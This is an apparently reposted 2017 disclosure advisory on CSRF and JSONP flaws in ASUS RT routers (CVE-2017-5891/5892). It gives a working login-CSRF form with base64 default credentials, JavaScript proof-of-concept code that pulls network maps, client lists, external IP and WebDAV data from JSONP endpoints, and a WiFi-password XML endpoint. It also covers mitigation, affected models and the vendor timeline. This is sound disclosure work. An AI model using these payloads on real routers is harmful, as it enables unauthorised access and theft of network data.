ASUS Routers CSRF / Information Disclosure

`[Original post here:  
https://wwws.nightwatchcybersecurity.com/2017/05/09/multiple-vulnerabilities-in-asus-routers/]  
  
Summary  
  
Various models of ASUS RT routers have several CSRF vulnerabilities  
allowing malicious sites to login and change settings in the router;  
multiple JSONP vulnerabilities allowing exfiltration of router data  
and an XML endpoint revealing WiFi passwords. Most of these issues  
have been fixed by Asus in the March 2017 firmware update under  
v3.0.0.4.380.7378. One issue (JSONP information disclosure) remains  
unfixed since the vendor doesn't consider it to be a security threat.  
CVE-2017-5891 has been assigned to the CSRF issues, and CVE-2017-5892  
to cover the non-CSRF issues.  
  
Vulnerability Details  
  
RT routers from ASUS like many other routers come with a built-in web  
interface accessible over the local network but normally not  
accessible via the Internet. We discovered multiple issues within that  
web interface that would can facilitate attacks on the router either  
via a malicious site visited by a user on the same network, or a  
malicious mobile or desktop application running on the same network.  
For the CSRF vulnerabilities, a user would need to visit a malicious  
site which can try to login and change settings. For the JSONP  
vulnerabilities, a website can load the JSONP endpoints via SCRIPT  
tags as long as matching function name is defined on that site. The  
XML endpoint requires a mobile or desktop application to exploit.  
NOTE: all of these assume that the attacker knows the local IP address  
of the router. This could probably be guessed or be determined via  
Javascript APIs like WebRTC. For desktop and mobile applications,  
determination of the gateway address should be trivial to implement.  
  
Issue #1 - Login Page CSRF  
  
The login page for the router doesn't have any kind of CSRF  
protection, thus allowing a malicious website to submit a login  
request to the router without the user's knowledge. Obviously, this  
only works if the site either knows the username and password of the  
router OR the user hasn't changed the default credentials ("admin /  
admin"). To exploit, submit the base-64 encoded username and password  
as "login_authorization" form post, to the "/login.cgi" URL of the  
browser.  
  
Example of a form that can exploit this issue (uses default credentials):  
  
<form action="http://192.168.1.1/login.cgi"  
method="post" target="_blank">  
<input name="login_authorization" type="text"  
value="YWRtaW46YWRtaW4=" />  
<input type="submit" /></form>  
  
Issue #2 - Save Settings CSRF  
  
The various pages within the interface that can save settings do not  
have CSRF protection. That means that a malicious site, once logged in  
as described above would be able to change any settings in the router  
without the user's knowledge.  
  
NOTE: We have not been to exploit this issue consistently  
  
Issue #3 - JSONP Information Disclosure Without Login  
  
Two JSONP endpoints exist within the router which allow detection of  
which ASUS router is running and some information disclosure. No login  
is required to the router. The vendor doesn't consider these endpoints  
a security threat.  
  
The endpoints are as follows:  
  
/findasus.json  
  
Returns the router model name, SSID name and the local IP address of the router  
  
iAmAlive([{model?Name: "XXX", ssid: "YYY", ipAddr: "ZZZZ"}])  
  
/httpd_check.json  
  
Returns: {"alive": 1, "isdomain": 0}  
  
Exploit code as follows:  
  
function iAmAlive(payload) {  
window.alert("Result returned: " + JSON.stringify(payload));  
}  
function alert1() {  
var script = document.createElement('script');  
script.src = 'http://192.168.1.1/findasus.json'  
document.getElementsByTagName('head')[0].appendChild(script);  
}  
function alert2() {  
var script = document.createElement('script');  
script.src = 'http://192.168.1.1/httpd_check.json'  
document.getElementsByTagName('head')[0].appendChild(script);  
}  
  
Issue #4 - JSONP Information Disclosure, Login Required  
  
There exist multiple JSONP endpoints within the router interface that  
reveal various data from the router including.  
  
Below is a list of endpoints and exploit code:  
  
/status.asp - Network Information  
  
function getstatus() {  
var script = document.createElement('script');  
script.src = 'http://192.168.1.1/status.asp'  
document.getElementsByTagName('head')[0].appendChild(script);  
}  
function show_wanlink_info() {  
var obj = {};  
obj.status = wanlink_status();  
obj.statusstr = wanlink_statusstr();  
obj.wanlink_type = wanlink_type();  
obj.wanlink_ipaddr = wanlink_ipaddr();  
obj.wanlink_xdns = wanlink_xdns();  
window.alert(JSON.stringify(obj));  
}  
  
<br/>  
<button onClick="getstatus()">Load Status script</button>  
<button onClick="show_wanlink_info()">Show wanlink info</button>  
<br/><br/>  
  
/wds_aplist_2g.asp - Surrounding Access points, 2.4 Ghz band  
  
/wds_aplist_5g.asp - Surrounding Access points, 5 Ghz band  
  
  
function getwds_2g() {  
var script = document.createElement('script');  
script.src = 'http://192.168.1.1/wds_aplist_2g.asp'  
document.getElementsByTagName('head')[0].appendChild(script);  
}  
function getwds_5g() {  
var script = document.createElement('script');  
script.src = 'http://192.168.1.1/wds_aplist_5g.asp'  
document.getElementsByTagName('head')[0].appendChild(script);  
}  
  
<br/>  
<button onClick="getwds_2g()">Load 2G info</button>  
<button onClick="getwds_5g()">Load 5G info</button>  
<button onClick="window.alert(JSON.stringify(wds_aplist))">Show AP info</button>  
<br/><br/>  
  
/update_networkmapd.asp - Network map of devices on the network  
  
function getmap() {  
var script = document.createElement('script');  
script.src = 'http://192.168.1.1/update_networkmapd.asp'  
document.getElementsByTagName('head')[0].appendChild(script);  
}  
  
<br/>  
<button onClick="getmap()">Load Network map</button>  
<button onClick="window.alert(JSON.stringify(fromNetworkmapd))">Show  
Map</button>  
<br/><br/>  
  
/update_clients.asp - Origin data  
  
function getorigin() {  
originData = [];  
var script = document.createElement('script');  
script.src = 'http://192.168.1.1/update_clients.asp'  
document.getElementsByTagName('head')[0].appendChild(script);  
}  
  
<br/>  
<button onClick="getorigin()">Load Origin</button>  
<button onClick="window.alert(JSON.stringify(originData))">Show Origin</button>  
  
/get_real_ip.asp - External IP address  
  
function getrealip() {  
var script = document.createElement('script');  
script.src = 'http://192.168.1.1/get_real_ip.asp'  
document.getElementsByTagName('head')[0].appendChild(script);  
}  
  
<br/>  
<button onClick="getrealip()">Load IP</button>  
<button onClick="window.alert(JSON.stringify(wan0_realip_ip))">Show IP</button>  
  
/get_webdavInfo.asp - WebDAV information  
  
function getwebdav() {  
var script = document.createElement('script');  
script.src = 'http://192.168.1.1/get_webdavInfo.asp';  
document.getElementsByTagName('head')[0].appendChild(script);  
}  
  
<br/>  
<button onClick="getwebdav()">Load WebDav</button>  
<button onClick="window.alert(JSON.stringify(pktInfo))">Show Info 1</button>  
<button onClick="window.alert(JSON.stringify(webdavInfo))">Show Info 1</button>  
<br/><br/>  
  
Issue #5 - XML Endpoint Reveals WiFi Passwords  
  
An XML endpoint exists in the router which reveals the WiFi password  
to the router but to fully exploit this issue, it would require a  
mobile or desktop application running on the local network since XML  
cannot be loaded cross origin in the browser. This endpoint can be  
accessed at the following URL and requires login:  
  
[router IP]/WPS_info.xml  
  
Mitigation Steps / Vendor Response  
  
Users should change the default credentials and apply the latest  
firmware released by ASUS, version v3.0.0.4.380.7378 or higher. There  
is no mitigation available for the issue #3 - JSONP information  
disclosure without login.  
  
Affected models include the following ASUS routers:  
  
RT-AC55U  
RT-AC56R  
RT-AC56S  
RT-AC56U  
RT-AC66U  
RT-AC88U  
RT-AC66R  
RT-AC66U  
RT-AC66W  
RT-AC68W  
RT-AC68P  
RT-AC68R  
RT-AC68U  
RT-AC87R  
RT-AC87U  
RT-AC51U  
RT-AC53U  
RT-AC1900P  
RT-AC3100  
RT-AC3200  
RT-AC5300  
RT-N11P  
RT-N12 (D1 version only)  
RT-N12+  
RT-N12E  
RT-N18U  
RT-N56U  
RT-N66R  
RT-N66U (B1 version only)  
RT-N66W  
  
References  
  
CVE-IDs: CVE-2017-5891 and CVE-2017-5892  
CERT/CC Tracking # VR-627  
  
Credits  
  
We would like to thank CERT/CC for helping to coordinate the  
disclosure process. This advisory was written by Yakov Shafranovich.  
  
Timeline  
  
2017-01-21: Initial contact with the vendor  
2017-01-23: Initial contact with CERT/CC  
2017-02-05: Vulnerability details and POC code provided to the vendor,  
CVEs requested  
2017-02-10: Vulnerability analysis received from the vendor  
2017-02-12: Beta firmware provided by the firmware to test fixes  
2017-02-12: Vendor fixes confirmed  
2017-03-31: Fixed firmware released publicly by the vendor  
2017-05-01: Draft advisory shared with the vendor and CERT/CC  
2017-05-09: Public disclosure  
`